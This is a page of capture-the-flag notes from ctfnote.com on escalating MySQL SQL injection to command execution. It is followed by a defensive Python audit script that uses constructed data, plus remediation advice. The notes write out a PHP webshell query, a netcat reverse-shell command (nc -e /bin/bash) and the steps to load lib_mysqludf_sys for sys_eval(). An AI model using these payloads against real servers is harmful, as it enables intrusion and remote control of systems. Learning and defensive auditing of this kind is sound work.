ctfnote.com

Webshell and UDF

Method 1: Webshell

If we have write permission, we can use UNION attack and INTO OUTFILE to create a PHP webshell on the target system:
SELECT username,password FROM users WHERE id = '1' UNION SELECT 1,'<?php system($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/images/webshell.php';
Here we choose the images directory since it is usually owned by the www-data user, not root.
Once the webshell is created successfully, we can spawn a netcat reverse shell. Start a listener on our local machine:
nc -nvlp 443
Spawn a netcat reverse shell using the webshell:
http://127.0.0.1/images/webshell.php?cmd=nc -e /bin/bash <local_ip> 443

Method 2: UDF

There is a plugin lib_mysqludf_sys which contains the following dangerous functions:
  • sys_eval(): executes any command and returns the result
  • sys_exec(): executes any command and returns the return code
  • sys_get(): gets an environment variable
  • sys_set(): creates or modifies an environment variable
MySQL does not ship this library by default. In order to use these functions, we have to import lib_mysqludf_sys first. Generate a binary version of the library using sqlmap's cloak.py:
cd sqlmap/extra/cloak
python3 cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys.so
Grab its content as hex:
xxd -ps lib_mysqludf_sys.so
Connect to MySQL. In the MySQL shell, copy and paste the hex data and unhex() it:
SELECT unhex('<hex_data_in_lib_linux.so>') INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
Here we use DUMPFILE instead of OUTFILE since DUMPFILE writes an unmodified binary file, while OUTFILE adds newlines and escapes some special characters.
Export the sys_eval() function from lib_mysqludf_sys.so:
CREATE FUNCTION sys_eval RETURNS STRING SONAME "lib_mysqludf_sys.so";
At this stage we can execute any command using the sys_eval() function:
SELECT sys_eval('id');
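Both methods depend on the same two things a defender can check: a database account holding the FILE privilege while secure_file_priv does not restrict where INTO OUTFILE/DUMPFILE may write, and UDFs registered in mysql.func. The audit below is an added example, not part of the original notes; the input rows are constructed to mimic the output of the queries named in the comments, and the admin allowlist and known-library set are assumptions to adapt to your own server.

```python
"""Audit a MySQL server for the file-write and UDF paths used above.
Rows are constructed here to mimic the result sets of:
  SHOW VARIABLES LIKE 'secure_file_priv';  ('' = unrestricted, NULL = disabled)
  SELECT user, host, File_priv FROM mysql.user;
  SELECT name, dl FROM mysql.func;
"""
import re

# Constructed sample data (not from a real server).
SECURE_FILE_PRIV = ""
USER_ROWS = [("root", "localhost", "Y"), ("webapp", "%", "Y"), ("report", "10.0.0.%", "N")]
FUNC_ROWS = [("sys_eval", "lib_mysqludf_sys.so")]

ADMIN_ACCOUNTS = {("root", "localhost")}   # assumed: accounts allowed to hold FILE
KNOWN_UDF_LIBS = set()                     # assumed: libraries an operator installed on purpose
SUSPECT_FUNC = re.compile(r"^sys_(eval|exec|get|set)$")   # lib_mysqludf_sys exports

def audit(secure_file_priv, user_rows, func_rows,
          admin_accounts=ADMIN_ACCOUNTS, known_libs=KNOWN_UDF_LIBS):
    """Return a list of human-readable findings; an empty list means nothing flagged."""
    findings = []
    # Empty string means INTO OUTFILE/DUMPFILE may write to any path mysqld can reach,
    # including plugin_dir (UDF drop) and a web root (webshell drop).
    if secure_file_priv == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE/DUMPFILE can write anywhere mysqld can")
    elif secure_file_priv is not None:
        findings.append(f"secure_file_priv restricts writes to {secure_file_priv}; "
                        "confirm it is neither plugin_dir nor a web root")
    # FILE privilege on a non-admin account is the precondition for both methods.
    for user, host, file_priv in user_rows:
        if file_priv == "Y" and (user, host) not in admin_accounts:
            findings.append(f"FILE privilege granted to non-admin account '{user}'@'{host}'")
    # Any registered UDF that runs commands, or comes from an unknown library, is flagged.
    for name, dl in func_rows:
        if SUSPECT_FUNC.match(name):
            findings.append(f"UDF {name}() registered from {dl}: command execution inside mysqld")
        elif dl not in known_libs:
            findings.append(f"UDF {name}() loaded from unrecognised library {dl}")
    return findings

if __name__ == "__main__":
    for line in audit(SECURE_FILE_PRIV, USER_ROWS, FUNC_ROWS):
        print("FINDING:", line)
```

Setting secure_file_priv to NULL (or a dedicated directory outside plugin_dir and the web root) and revoking FILE from application accounts closes both paths; removing a registered UDF is done with DROP FUNCTION plus deleting the library from plugin_dir.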